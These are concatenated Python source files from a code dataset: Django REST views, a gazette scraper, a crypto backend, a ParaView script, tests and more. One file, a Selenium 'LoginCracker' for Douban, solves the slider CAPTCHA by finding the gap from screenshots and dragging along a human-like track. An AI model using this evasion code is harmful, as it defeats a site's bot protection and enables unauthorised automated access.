class GameParticipationRequestList(generics.ListCreateAPIView):
queryset = GameParticipationRequest.objects.all()
serializer_class = GameParticipationRequestSerializer
permission_classes = [permissions.IsAuthenticated]
def get_queryset(self):
"""
Only show game participation requests of games that authenticated user is administering.
"""
qs = super().get_queryset()
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
player = Player.objects.get(user=user)
return qs.filter((Q(request_to_game__admin=user) | Q(request_from=player)) & Q(state__isnull=True))
def perform_create(self, serializer):
request_json = self.request.data
user = self.request.user
        if 'game_id' not in request_json:
raise exceptions.ParseError(detail="'game_id' body parameter missing.")
player = Player.objects.get(user=user)
game = get_object_or_404(Game, game_id=request_json['game_id'])
if player.user == game.admin:
raise exceptions.PermissionDenied(detail="A game admin cannot request participation to said game.")
active_request = GameParticipationRequest.objects.filter(request_from=player, request_to_game=game, state__isnull=True)
if active_request:
raise Conflict(detail="An active request already exists from this user.")
participating = player in game.players.all()
if participating:
raise Conflict(detail="Already participating.")
request_datetime = timezone.now()
notification = Notification(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=request_datetime,
sender=user,
game=game,
user=game.admin)
notification.save()
serializer.save(request_from=player,
request_to_game=game,
request_datetime=request_datetime)
class GameParticipationRequestDetailPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
return ((request.user == obj.request_from.user or request.user == obj.request_to_game.admin) and not obj.state)
class GameParticipationRequestDetail(generics.RetrieveUpdateAPIView):
lookup_field = 'id'
queryset = GameParticipationRequest.objects.all()
serializer_class = GameParticipationRequestSerializer
    permission_classes = [permissions.IsAuthenticated, GameParticipationRequestDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
participation_request = GameParticipationRequest.objects.get(id=self.kwargs['id'])
if not ((self.request.user == participation_request.request_from.user or self.request.user == participation_request.request_to_game.admin) and not participation_request.state):
raise exceptions.PermissionDenied()
if self.request.user == participation_request.request_from.user and 'action' in self.request.data and self.request.data['action'] == 'cancel':
# Remove notification from game admin if it still is unread
notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=participation_request.request_datetime,
user=participation_request.request_to_game.admin,
read=False)
if notification:
notification.delete()
serializer.save(state="CANCELED",
action_taken_datetime=timezone.now())
elif self.request.user == participation_request.request_to_game.admin and 'action' in self.request.data and self.request.data['action'] == 'accept':
request_datetime = timezone.now()
# Add player to game players list and send notification to player
participation_request.request_to_game.players.add(participation_request.request_from)
notification = Notification(notification_type=NotificationType.ADDED_TO_GAME.value,
creation_datetime=request_datetime,
sender=participation_request.request_to_game.admin,
game=participation_request.request_to_game,
user=participation_request.request_from.user)
notification.save()
# Mark game participation request notification as read if it still is unread
participation_request_notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=participation_request.request_datetime,
user=participation_request.request_to_game.admin,
read=False)
if participation_request_notification:
participation_request_notification = Notification.objects.get(pk=participation_request_notification[0].pk)
participation_request_notification.read = True
participation_request_notification.read_datetime = request_datetime
participation_request_notification.save()
# Update participation_request state and save datetime of action_taken
serializer.save(state="ACCEPTED",
action_taken_datetime=request_datetime)
elif self.request.user == participation_request.request_to_game.admin and 'action' in self.request.data and self.request.data['action'] == 'decline':
request_datetime = timezone.now()
# Mark game participation request notification as read if it still is unread
notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=participation_request.request_datetime,
user=participation_request.request_to_game.admin,
read=False)
if notification:
notification = Notification.objects.get(pk=notification[0].pk)
notification.read = True
notification.read_datetime = request_datetime
notification.save()
# Update participation_request state and save datetime of action_taken
serializer.save(state="DECLINED",
action_taken_datetime=request_datetime)
else:
raise exceptions.ParseError()
|
StarcoderdataPython
|
338429
|
<reponame>dadosabertossergipe/querido-diario<filename>data_collection/gazette/spiders/rs_porto_alegre.py
import datetime as dt
import dateparser
from dateutil.rrule import MONTHLY, rrule
from gazette.items import Gazette
from gazette.spiders.base import BaseGazetteSpider
class RsPortoAlegreSpider(BaseGazetteSpider):
TERRITORY_ID = "4314902"
name = "rs_porto_alegre"
allowed_domains = ["portoalegre.rs.gov.br"]
start_urls = ["http://www2.portoalegre.rs.gov.br/dopa/"]
start_date = dt.date(2003, 9, 3)
custom_settings = {"CONCURRENT_REQUESTS": 8}
def parse(self, response):
menu_years = response.css("ul#menucss > li")
for menu_year in menu_years:
menu_months = menu_year.xpath("./ul/li[not(contains(a/text(), 'Diário'))]")
months_links = self._filter_months_of_interest(menu_months)
yield from response.follow_all(months_links, callback=self.parse_month_page)
def parse_month_page(self, response):
editions = response.css("#conteudo a[href$='.pdf']:not(.gbox)")
for edition in editions:
text = edition.css("::text")
date = self._extract_date(text)
if date is None:
continue
if not self.start_date <= date <= self.end_date:
continue
is_extra_edition = "extra" in text.get().lower()
url = response.urljoin(edition.attrib["href"])
power = self._get_power_from_url(url)
yield Gazette(
date=date,
file_urls=[url],
is_extra_edition=is_extra_edition,
power=power,
)
def _filter_months_of_interest(self, month_elements):
# avoid skipping months if day of start_date is at the end of the month
first_day_of_start_date_month = dt.date(
self.start_date.year, self.start_date.month, 1
)
months_of_interest = list(
rrule(MONTHLY, dtstart=first_day_of_start_date_month, until=self.end_date)
)
for month, month_element in enumerate(month_elements, start=1):
year = int(month_element.css("a::text").re_first(r"\d{4}"))
href = month_element.css("a").attrib["href"]
month_date = dt.datetime(year, month, 1)
if month_date in months_of_interest:
yield href
def _extract_date(self, text):
common_pattern = text.re_first(r"\d+/\d+/\d+")
full_written_pattern = text.re_first(r"\d{1,2}º?\s+de[\w\s]+\d{4}")
marco_2010_pattern = text.re_first(r"marco2010[_\s]+(\d{2})marco10")
if common_pattern:
return dt.datetime.strptime(common_pattern, "%d/%m/%Y").date()
elif full_written_pattern:
full_written_pattern = full_written_pattern.replace("º", "")
return dateparser.parse(full_written_pattern, languages=["pt"]).date()
elif marco_2010_pattern:
day = int(marco_2010_pattern)
return dt.date(2010, 3, day)
def _get_power_from_url(self, url):
if "executivo" in url.lower():
power = "executive"
elif "legislativo" in url.lower():
power = "legislative"
else:
power = "executive_legislative"
return power
|
StarcoderdataPython
|
11265294
|
__author__ = 'jie'
TOEHOLD_LENGTH = 5
from cadnano.cnproxy import UndoCommand
from strandrep.toehold_list import ToeholdList
from strandrep.toehold import Toehold
class CreateToeholdCommand(UndoCommand):
'''
called by Domain to create toehold on an end of an oligo;
can be undone if added to undo stack before executed;
'''
def __init__(self,vh,domain,end):
# get references from domain
super(CreateToeholdCommand,self).__init__('create strand')
self._domain = domain
self._doc = domain._doc
self._oligo = domain.oligo()
self._insert_index = None
self._prime = end
if end == 3:
self._insert_index = domain.idx3Prime
else:
self._insert_index = domain.idx5Prime
def redo(self):
# create toehold list as container for toehold domains;
# add model toehold to toehold list;
# create toehold item and show item on render view;
toehold = Toehold(TOEHOLD_LENGTH,self._domain,self._prime) # model toehold
toeholdList = ToeholdList(self._domain,toehold)
if self._prime == 3:
self._domain.setToehold3p(toeholdList)
elif self._prime == 5:
self._domain.setToehold5p(toeholdList)
self._domain.toeholdAddedSignal.emit(toehold,self._prime) # emitted by end domain; notifies strand item to create toehold item
#TODO: update domain oligo length
def undo(self):
# delete model toehold and toehold item
if self._prime == 5:
toeholdList = self._domain.toehold5p()
toehold_name = 'T5'+self._domain._name
if self._prime == 3:
toeholdList = self._domain.toehold3p()
toehold_name = 'T3'+self._domain._name
toeholdList.removeToehold(toehold_name)
# remove toehold item if no toehold remains in toehold list
if len(toeholdList._toehold_list) == 0:
if self._prime == 5:
self._domain.setToehold5p(None)
if self._prime == 3:
self._domain.setToehold3p(None)
self._domain.toeholdRemovedSignal.emit(toeholdList,self._prime) # notifies end domain strand item to hide toehold item
|
StarcoderdataPython
|
6505836
|
<gh_stars>1000+
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
from cryptography import utils
from cryptography.exceptions import (
InvalidTag, UnsupportedAlgorithm, _Reasons
)
from cryptography.hazmat.primitives import ciphers, constant_time
from cryptography.hazmat.primitives.ciphers import modes
from cryptography.hazmat.primitives.ciphers.modes import (
CFB, CFB8, CTR, OFB
)
@utils.register_interface(ciphers.CipherContext)
class _CipherContext(object):
def __init__(self, backend, cipher, mode, operation):
self._backend = backend
self._cipher = cipher
self._mode = mode
self._operation = operation
# There is a bug in CommonCrypto where block ciphers do not raise
# kCCAlignmentError when finalizing if you supply non-block aligned
# data. To work around this we need to keep track of the block
# alignment ourselves, but only for alg+mode combos that require
# block alignment. OFB, CFB, and CTR make a block cipher algorithm
# into a stream cipher so we don't need to track them (and thus their
# block size is effectively 1 byte just like OpenSSL/CommonCrypto
# treat RC4 and other stream cipher block sizes).
# This bug has been filed as rdar://15589470
self._bytes_processed = 0
if (isinstance(cipher, ciphers.BlockCipherAlgorithm) and not
isinstance(mode, (OFB, CFB, CFB8, CTR))):
self._byte_block_size = cipher.block_size // 8
else:
self._byte_block_size = 1
registry = self._backend._cipher_registry
try:
cipher_enum, mode_enum = registry[type(cipher), type(mode)]
except KeyError:
raise UnsupportedAlgorithm(
"cipher {0} in {1} mode is not supported "
"by this backend.".format(
cipher.name, mode.name if mode else mode),
_Reasons.UNSUPPORTED_CIPHER
)
ctx = self._backend._ffi.new("CCCryptorRef *")
ctx = self._backend._ffi.gc(ctx, self._backend._release_cipher_ctx)
if isinstance(mode, modes.ModeWithInitializationVector):
iv_nonce = mode.initialization_vector
elif isinstance(mode, modes.ModeWithNonce):
iv_nonce = mode.nonce
else:
iv_nonce = self._backend._ffi.NULL
if isinstance(mode, CTR):
mode_option = self._backend._lib.kCCModeOptionCTR_BE
else:
mode_option = 0
res = self._backend._lib.CCCryptorCreateWithMode(
operation,
mode_enum, cipher_enum,
self._backend._lib.ccNoPadding, iv_nonce,
cipher.key, len(cipher.key),
self._backend._ffi.NULL, 0, 0, mode_option, ctx)
self._backend._check_cipher_response(res)
self._ctx = ctx
def update(self, data):
# Count bytes processed to handle block alignment.
self._bytes_processed += len(data)
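        # The output buffer must also hold any block data CommonCrypto buffered earlier, hence len(data) + block size - 1.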
buf = self._backend._ffi.new(
"unsigned char[]", len(data) + self._byte_block_size - 1)
outlen = self._backend._ffi.new("size_t *")
res = self._backend._lib.CCCryptorUpdate(
self._ctx[0], data, len(data), buf,
len(data) + self._byte_block_size - 1, outlen)
self._backend._check_cipher_response(res)
return self._backend._ffi.buffer(buf)[:outlen[0]]
def finalize(self):
# Raise error if block alignment is wrong.
if self._bytes_processed % self._byte_block_size:
raise ValueError(
"The length of the provided data is not a multiple of "
"the block length."
)
buf = self._backend._ffi.new("unsigned char[]", self._byte_block_size)
outlen = self._backend._ffi.new("size_t *")
res = self._backend._lib.CCCryptorFinal(
self._ctx[0], buf, len(buf), outlen)
self._backend._check_cipher_response(res)
self._backend._release_cipher_ctx(self._ctx)
return self._backend._ffi.buffer(buf)[:outlen[0]]
@utils.register_interface(ciphers.AEADCipherContext)
@utils.register_interface(ciphers.AEADEncryptionContext)
class _GCMCipherContext(object):
def __init__(self, backend, cipher, mode, operation):
self._backend = backend
self._cipher = cipher
self._mode = mode
self._operation = operation
self._tag = None
registry = self._backend._cipher_registry
try:
cipher_enum, mode_enum = registry[type(cipher), type(mode)]
except KeyError:
raise UnsupportedAlgorithm(
"cipher {0} in {1} mode is not supported "
"by this backend.".format(
cipher.name, mode.name if mode else mode),
_Reasons.UNSUPPORTED_CIPHER
)
ctx = self._backend._ffi.new("CCCryptorRef *")
ctx = self._backend._ffi.gc(ctx, self._backend._release_cipher_ctx)
self._ctx = ctx
res = self._backend._lib.CCCryptorCreateWithMode(
operation,
mode_enum, cipher_enum,
self._backend._lib.ccNoPadding,
self._backend._ffi.NULL,
cipher.key, len(cipher.key),
self._backend._ffi.NULL, 0, 0, 0, self._ctx)
self._backend._check_cipher_response(res)
res = self._backend._lib.CCCryptorGCMAddIV(
self._ctx[0],
mode.initialization_vector,
len(mode.initialization_vector)
)
self._backend._check_cipher_response(res)
# CommonCrypto has a bug where calling update without at least one
# call to authenticate_additional_data will result in null byte output
# for ciphertext. The following empty byte string call prevents the
# issue, which is present in at least 10.8 and 10.9.
# Filed as rdar://18314544
self.authenticate_additional_data(b"")
def update(self, data):
buf = self._backend._ffi.new("unsigned char[]", len(data))
args = (self._ctx[0], data, len(data), buf)
if self._operation == self._backend._lib.kCCEncrypt:
res = self._backend._lib.CCCryptorGCMEncrypt(*args)
else:
res = self._backend._lib.CCCryptorGCMDecrypt(*args)
self._backend._check_cipher_response(res)
return self._backend._ffi.buffer(buf)[:]
def finalize(self):
# CommonCrypto has a yet another bug where you must make at least one
# call to update. If you pass just AAD and call finalize without a call
# to update you'll get null bytes for tag. The following update call
# prevents this issue, which is present in at least 10.8 and 10.9.
# Filed as rdar://18314580
self.update(b"")
tag_size = self._cipher.block_size // 8
tag_buf = self._backend._ffi.new("unsigned char[]", tag_size)
tag_len = self._backend._ffi.new("size_t *", tag_size)
res = self._backend._lib.CCCryptorGCMFinal(
self._ctx[0], tag_buf, tag_len
)
self._backend._check_cipher_response(res)
self._backend._release_cipher_ctx(self._ctx)
self._tag = self._backend._ffi.buffer(tag_buf)[:]
if (self._operation == self._backend._lib.kCCDecrypt and
not constant_time.bytes_eq(
self._tag[:len(self._mode.tag)], self._mode.tag
)):
raise InvalidTag
return b""
def authenticate_additional_data(self, data):
res = self._backend._lib.CCCryptorGCMAddAAD(
self._ctx[0], data, len(data)
)
self._backend._check_cipher_response(res)
tag = utils.read_only_property("_tag")
|
StarcoderdataPython
|
1861583
|
import csv
from math import sqrt
from paraview import servermanager
from paraview.simple import *
YIELD_STRENGTH = 1.6e8
def get_mean_component(array, component_index):
array_length = array.GetNumberOfTuples()
return sum(array.GetComponent(i, component_index) for i in range(array_length)) / array_length
def get_max_component(array, component_index):
array_length = array.GetNumberOfTuples()
return max(array.GetComponent(i, component_index) for i in range(array_length))
reader = PVDReader(FileName=r"C:\Projects\effective_yield_surface\calc.pvd")
data = servermanager.Fetch(reader)
point_data = data.GetPointData()
stress = point_data.GetArray("Stress")
max_mises_stress = get_max_component(stress, 6)
scale_coefficient = YIELD_STRENGTH / max_mises_stress
averaged_stress = [
[get_mean_component(stress, 0), get_mean_component(stress, 3)],
[get_mean_component(stress, 3), get_mean_component(stress, 1)],
]
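# Principal stresses of the averaged 2D stress tensor (array components assumed: 0=xx, 1=yy, 3=xy):
#   sigma_1,2 = (s_xx + s_yy) / 2 +/- sqrt(((s_xx - s_yy) / 2) ** 2 + s_xy ** 2)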
principial_averaged_stress = [
(averaged_stress[0][0] + averaged_stress[1][1]) / 2
+ sqrt(((averaged_stress[0][0] - averaged_stress[1][1]) / 2) ** 2 + averaged_stress[0][1] ** 2),
(averaged_stress[0][0] + averaged_stress[1][1]) / 2
- sqrt(((averaged_stress[0][0] - averaged_stress[1][1]) / 2) ** 2 + averaged_stress[0][1] ** 2),
]
with open("outs.csv", "a+") as outs:
outs.write(
"{},{}\n".format(
principial_averaged_stress[0] / YIELD_STRENGTH * scale_coefficient,
principial_averaged_stress[1] / YIELD_STRENGTH * scale_coefficient,
)
)
outs.write(
"{},{}\n".format(
principial_averaged_stress[1] / YIELD_STRENGTH * scale_coefficient,
principial_averaged_stress[0] / YIELD_STRENGTH * scale_coefficient,
)
)
|
StarcoderdataPython
|
9660854
|
<reponame>EdinburghGenomics/hesiod<filename>hesiod_version.py
#!/usr/bin/env python3
from hesiod import hesiod_version
print("{}".format(hesiod_version))
|
StarcoderdataPython
|
271997
|
from util import hash_util
import hashlib
class Verification:
@classmethod
def validate_j_chain(cls, chain):
for (index, block) in enumerate(chain):
if index > 0:
if block.previous_hash != hash_util.hash_block(chain[index - 1]):
print("Die chain wurde geändert")
return False
if not cls.check_valid_proof(block.transactions[:-1], block.previous_hash, block.proof):
print("Proof of work is not valid")
return False
return True
@staticmethod
def verify_transaction(transaction, sender, get_balance):
return get_balance(sender) >= transaction.amount
@staticmethod
def check_valid_proof(transactions, last_hash, proof):
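        # Recompute the hash over (ordered transactions, previous block hash, proof) and require a "00" prefix, i.e. two leading zeros of difficulty.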
guess = (str([transaction.to_odered_dict() for transaction in transactions]) + str(last_hash) + str(
proof)).encode()
guess_hash = hashlib.sha3_256(guess).hexdigest()
return guess_hash[0:2] == '00'
|
StarcoderdataPython
|
8127415
|
# 4. Write a python program that deletes a car from the server using the API.
import requests
import json
url = 'http://127.0.0.1:5000/cars/08%20c%201234'
response = requests.delete(url)
print(response.status_code)
print(response.text)
|
StarcoderdataPython
|
12803815
|
"""
This file provides a single interface to unittest objects for our
tests while supporting python < 2.7 via unittest2.
If you need something from the unittest namespace it should be
imported here from the relevant module and then imported into your
test from here
"""
# Import python libs
import os
import sys
# support python < 2.7 via unittest2
if sys.version_info[0:2] < (2,7):
try:
from unittest2 import TestLoader, TextTestRunner,\
TestCase, expectedFailure, \
TestSuite
except ImportError:
print("You need to install unittest2 to run the salt tests")
sys.exit(1)
else:
from unittest import TestLoader, TextTestRunner,\
TestCase, expectedFailure, \
TestSuite
# Set up paths
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
SALT_LIBS = os.path.dirname(TEST_DIR)
sys.path.insert(0, TEST_DIR)
sys.path.insert(0, SALT_LIBS)
|
StarcoderdataPython
|
126251
|
<filename>setup.py<gh_stars>0
from setuptools import find_packages, setup
setup(name='sacred_logs',
version='0.2.0',
install_requires=['click', 'matplotlib', 'pandas'],
packages=find_packages(),
entry_points="""
[console_scripts]
sacredlogs=sacred_logs.cli:cli
""")
|
StarcoderdataPython
|
8122347
|
import sys
import traceback
import discord
from bot.utils import wrap_in_code
from discord.ext import commands
ignored_errors = (
commands.CommandNotFound,
commands.DisabledCommand,
commands.NotOwner,
)
error_types = (
(commands.CommandOnCooldown, "Cooldown"),
(commands.UserInputError, "Bad input"),
(commands.CheckFailure, "Check failed"),
)
class Errors(commands.Cog):
"""Error handlers"""
def __init__(self, bot):
self.bot = bot
super().__init__()
async def report_error(self, error, *, fields):
exception = "".join(
traceback.format_exception(type(error), error, error.__traceback__)
)
print(exception, file=sys.stderr)
embed = discord.Embed(
title="Unhandled error", description=wrap_in_code(exception, block="py")
)
for field in fields:
embed.add_field(**field)
info = await self.bot.application_info()
await info.owner.send(embed=embed)
async def on_error(self, event, *args, **kwargs):
error = sys.exc_info()[1]
await self.report_error(
error,
fields=[
{
"name": "Event",
"value": f"```{event}```",
"inline": False,
},
*(
{
"name": f"args[{index!r}]",
"value": wrap_in_code(repr(arg), block=True),
"inline": False,
}
for index, arg in enumerate(args)
),
*(
{
"name": f"kwargs[{index!r}]",
"value": wrap_in_code(repr(arg), block=True),
"inline": False,
}
for index, arg in kwargs.items()
),
],
)
@commands.Cog.listener()
async def on_command_error(self, ctx: commands.Context, error):
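        # Unwrap CommandInvokeError-style wrappers to get at the original exception.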
error = getattr(error, "original", error)
if isinstance(error, ignored_errors):
return
for (error_type, error_msg) in error_types:
if isinstance(error, error_type):
await ctx.send(
embed=discord.Embed(title=error_msg, description=str(error)),
)
return
await self.report_error(
error,
fields=[
{
"name": "Message",
"value": ctx.message.content,
"inline": False,
},
],
)
def setup(bot):
bot.add_cog(Errors(bot))
|
StarcoderdataPython
|
8138126
|
<filename>stix2elevator/test/test_main.py
# Standard Library
from argparse import Namespace
import io
import os
# external
import pytest
from stix.core import STIXPackage
import stixmarx
# internal
from stix2elevator import elevate, options
from stix2elevator.options import (
ElevatorOptions, get_option_value, initialize_options, set_option_value
)
from stix2elevator.utils import find_dir, get_environment_variable_value
# This module only tests for the main functions used to interact with the elevator from a programmatic or
# interactive point of view. Actual idioms tests are done in test_idioms.py
def setup_options():
version = get_environment_variable_value('VERSION', "2.1")
policy = get_environment_variable_value("MISSING_POLICY", "ignore")
initialize_options()
set_option_value("missing_policy", policy)
set_option_value("log_level", "DEBUG")
set_option_value("spec_version", version)
set_option_value("validator_args", "--version " + version)
set_option_value("policy", "no_policy")
@pytest.mark.parametrize("opts", [
ElevatorOptions(policy="no_policy", spec_version=get_environment_variable_value('VERSION'), log_level="DEBUG", disabled=[212, 901]),
{"policy": "no_policy", "spec_version": get_environment_variable_value('VERSION'), "log_level": "DEBUG", "disabled": [212, 901]},
Namespace(policy="no_policy", spec_version=get_environment_variable_value('VERSION'), log_level="DEBUG", disabled="212,901",
file_=None, incidents=False, missing_policy=get_environment_variable_value("MISSING_POLICY"),
custom_property_prefix="elevator", infrastructure=False, package_created_by_id=None,
default_timestamp=None, validator_args="--strict-types", enabled=None, silent=False,
message_log_directory=None, output_directory=None, markings_allowed="", acs=False),
])
def test_setup_options(opts):
options.ALL_OPTIONS = None # To make sure we can set it again
initialize_options(opts)
assert get_option_value("policy") == "no_policy"
assert get_option_value("spec_version") == get_environment_variable_value('VERSION')
assert get_option_value("log_level") == "DEBUG"
assert get_option_value("disabled") == [212, 901]
def test_elevate_with_marking_container():
setup_options()
directory = os.path.dirname(__file__)
xml_idioms_dir = find_dir(directory, "idioms-xml")
archive_file = os.path.join(xml_idioms_dir, "141-TLP-marking-structures.xml")
with io.open(archive_file, mode="r", encoding="utf-8") as f:
input_stix = f.read()
container = stixmarx.parse(io.StringIO(input_stix))
json_result = elevate(container)
assert json_result
print(json_result)
def test_elevate_with_stix_package():
setup_options()
directory = os.path.dirname(__file__)
xml_idioms_dir = find_dir(directory, "idioms-xml")
archive_file = os.path.join(xml_idioms_dir, "141-TLP-marking-structures.xml")
with io.open(archive_file, mode="r", encoding="utf-8") as f:
input_stix = f.read()
json_result = elevate(STIXPackage.from_xml(io.StringIO(input_stix)))
assert json_result
print(json_result)
def test_elevate_with_text_string():
setup_options()
directory = os.path.dirname(__file__)
xml_idioms_dir = find_dir(directory, "idioms-xml")
archive_file = os.path.join(xml_idioms_dir, "141-TLP-marking-structures.xml")
with io.open(archive_file, mode="r", encoding="utf-8") as f:
input_stix = f.read()
json_result = elevate(input_stix)
assert json_result
print(json_result)
def test_elevate_with_binary_string():
setup_options()
directory = os.path.dirname(__file__)
xml_idioms_dir = find_dir(directory, "idioms-xml")
archive_file = os.path.join(xml_idioms_dir, "141-TLP-marking-structures.xml")
with io.open(archive_file, mode="rb") as f:
input_stix = f.read()
json_result = elevate(input_stix)
assert json_result
print(json_result)
def test_elevate_with_file():
setup_options()
directory = os.path.dirname(__file__)
xml_idioms_dir = find_dir(directory, "idioms-xml")
archive_file = os.path.join(xml_idioms_dir, "141-TLP-marking-structures.xml")
json_result = elevate(archive_file)
assert json_result
print(json_result)
|
StarcoderdataPython
|
6554234
|
<reponame>Hephaest/DoubanCrawler
import requests, json
from selenium import common
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from PIL import Image
import time
class LoginCracker:
def __init__(self, username, password, driver, wait, progress_bar, style):
self.login_url = "https://accounts.douban.com/passport/login"
self.driver = driver
self.wait = wait
self.username = username
self.password = password
self.actual_block_width = 50
self.progress_bar = progress_bar
self.style = style
def login_with_captcha(self):
try:
            # Step 1: grab the slide block (the jigsaw piece)
block_top, block_left, block_width = self.get_captcha(self.driver, self.wait, "slideBlock")
            # Step 2: grab the background image
slideBkg = self.get_captcha(self.driver, self.wait, "slideBkg", block_top, block_left, block_width)
            # Step 3: distance to move = left offset of the gap + the slide block's blank right margin
distance = self.get_distance(slideBkg) + self.actual_block_width + (
block_width - self.actual_block_width) / 2
            # Step 4: mimic human dragging (accelerate uniformly, then decelerate uniformly)
tracks = self.get_tracks(distance)
            # Step 5: drag along the generated track to pass the verification
drag_button = self.wait.until(EC.presence_of_element_located((By.ID, 'tcaptcha_drag_button')))
ActionChains(self.driver).click_and_hold(drag_button).perform()
for track in tracks:
ActionChains(self.driver).move_by_offset(xoffset=track, yoffset=0).perform()
                time.sleep(0.1) # release the mouse after 0.1 s
ActionChains(self.driver).release().perform()
            # wait here so the POST request can complete; on success the page redirects to the account home page
try:
time.sleep(3)
self.driver.find_element_by_id("slideBlock")
self.login_with_captcha()
except common.exceptions.NoSuchElementException:
self.driver.switch_to.default_content()
self.progress_bar['value'] = 20
self.style.configure("green.Horizontal.TProgressbar", text="20%")
return "识破验证码,已登录。"
except:
self.driver.refresh()
self.login()
def click_submit(self):
try:
login_by_password = self.wait.until(EC.element_to_be_clickable((By.CLASS_NAME, "account-tab-account")))
login_by_password.click()
input_username = self.driver.find_element_by_id('username')
input_password = self.driver.find_element_by_id('password')
input_username.send_keys(self.username)
            input_password.send_keys(self.password)
submit_button = self.wait.until(EC.element_to_be_clickable((By.LINK_TEXT, "登录豆瓣")))
submit_button.click()
except common.exceptions.NoSuchElementException:
self.driver.refresh()
self.click_submit()
except common.exceptions.TimeoutException:
return "豆瓣可能检测到你的行为!稍等片刻,请勿多次尝试。"
try:
popup_frame = self.wait.until(EC.presence_of_element_located((By.TAG_NAME, 'iframe')))
self.driver.switch_to.frame(popup_frame)
time.sleep(3)
self.driver.find_element_by_id("slideBlock")
return self.login_with_captcha()
except common.exceptions.NoSuchElementException:
try:
self.driver.find_element_by_id("capImg")
except common.exceptions.NoSuchElementException:
self.progress_bar['value'] = 20
self.style.configure("green.Horizontal.TProgressbar", text="20%")
return "跳过验证码,已登录。"
def get_captcha(self, driver, wait, id_name, top=0, left=0, width=0):
try:
img = wait.until(EC.presence_of_element_located((By.ID, id_name)))
except common.exceptions.TimeoutException:
return "请求超时。"
        time.sleep(3) # make sure the image has finished loading
captcha = self.get_screenshot(driver, id_name, img.size)
if left == 0:
css_style = '{\"' + img.get_attribute('style').replace(' ', '').replace('px', '').replace(';', ', \"') \
.replace(':', '\": ').strip(', \"') + '}'
block_json = json.loads(css_style)
return block_json['top'], block_json['left'], block_json['width']
else:
captcha = captcha.crop((left + width, top, img.size['width'], top + width))
captcha.save('Images/' + id_name + '.png')
return captcha
def get_screenshot(self, driver, id_name, adjust_size):
file_path = 'Images/' + id_name + '.png'
driver.find_element_by_id(id_name).screenshot(file_path)
Image.open(file_path).resize((adjust_size['width'], adjust_size['height']), Image.ANTIALIAS).save(file_path)
return Image.open(file_path)
def get_distance(self, slideBkg):
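        # Scan one horizontal line (y=20) of the background for a dark run in the right half of the image, taken as the left edge of the puzzle gap.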
img_rgb = slideBkg.convert('RGB')
for i in range(0, slideBkg.size[0] - 1, 3):
R, G, B = img_rgb.getpixel((i, 20))
if R < 100 and G < 100 and B < 100 and i > slideBkg.size[0] / 2:
RGB = img_rgb.getpixel((i + 5, 20))
if RGB[0] < 100 and RGB[1] < 100 and RGB[2] < 100:
return i
def get_tracks(self, distance):
        # initial velocity
        v = 0
        # length of one time step used when sampling the track
        t = 1
        # list of displacements; each element is the distance moved during one time step
        tracks = []
        # distance covered so far
        current = 0
        # start decelerating once the midpoint is reached
        mid = distance / 2
while current < distance:
a = 30 if current < mid else -40
            # initial velocity for this step
            v0 = v
            # displacement during this step: s = v0 * t + 0.5 * a * t**2
            s = v0 * t + 0.5 * a * (t ** 2)
            if s < distance - current:
                # append to the track list
                tracks.append(round(s))
                # advance the current position
                current += s
                # the end velocity of this step becomes the initial velocity of the next one
v = v0 + a * t
else:
tracks.append(int(distance - current))
return tracks
def login(self):
self.driver.get(self.login_url)
try:
return self.click_submit()
except requests.exceptions.ConnectionError:
self.driver.close()
return "网络恍惚!稍后再试!"
|
StarcoderdataPython
|
3480018
|
<gh_stars>1-10
###############################################################################
#
# Exceptions - A class for XlsxWriter exceptions.
#
# Copyright 2013-2019, <NAME>, <EMAIL>
#
class XlsxWriterException(Exception):
"""Base exception for XlsxWriter."""
class XlsxInputError(XlsxWriterException):
"""Base exception for all input data related errors."""
class XlsxFileError(XlsxWriterException):
"""Base exception for all file related errors."""
class EmptyChartSeries(XlsxInputError):
"""Chart must contain at least one data series."""
class DuplicateTableName(XlsxInputError):
"""Worksheet table name already exists."""
class InvalidWorksheetName(XlsxInputError):
"""Worksheet name is too long or contains restricted characters."""
class DuplicateWorksheetName(XlsxInputError):
"""Worksheet name already exists."""
class ReservedWorksheetName(XlsxInputError):
"""Worksheet name 'History' is reserved by Excel."""
class UndefinedImageSize(XlsxFileError):
"""No size data found in image file."""
class UnsupportedImageFormat(XlsxFileError):
"""Unsupported image file format."""
|
StarcoderdataPython
|
1759163
|
<filename>alfirt.opencv/src/algorithms/SURFFlannMatchingAlgorithm.py<gh_stars>1-10
'''
Created on Sep 9, 2011
@author: Ankhazam & Piotr & OpenCV team
'''
from algorithms.AlgorithmBase import AlgorithmBase
import classification.SURFFlannMatcher as SFM
import classification.TrainedObject as TO
import image.ImageDescriptionReader as IDR
import image.ImageDescriptionWriter as IDW
import common.Utils as TU
import cv2
import os
import shutil
class SURFFlannMatchingAlgorithm(AlgorithmBase):
'''
Simple algorithm used for matching orientations using Flann matching method.
'''
def __init__(self, threshold=400):
'''
Constructor
'''
self.threshold = threshold
def __train(self, learningPath):
'''
Trains the system with new object data
@param learningPath: Has to be root of the following structure
@param threshold: SURF Hessian threshold used for training
learningPath
|_ObjectA
| |_1.imd, 1.ren
| |_...
|_ObjectB
| |_...
|_ObjectC
|_...
@return: List of @see: TrainedObject
'''
trainedObjects = list() # list of trained objects
trainingUtils = TU.Utils(self.threshold)
for (root, dirs, files) in os.walk(learningPath):
if len(dirs) == 0: # we're in an object folder
# ObjectFilename
objName = os.path.basename(root)
print "root: ", objName
# currently trained object
trainedObject = TO.TrainedObject(objName, self.threshold)
# real training
for file1 in files: # we won't implement natural human sorting
# do not use .* and *.imd files
if file1.startswith('.') or file1.endswith(".imd"):
continue
# fetching ImageDescription
imDescPath = os.path.join(root, file1[:-4]) + ".imd"
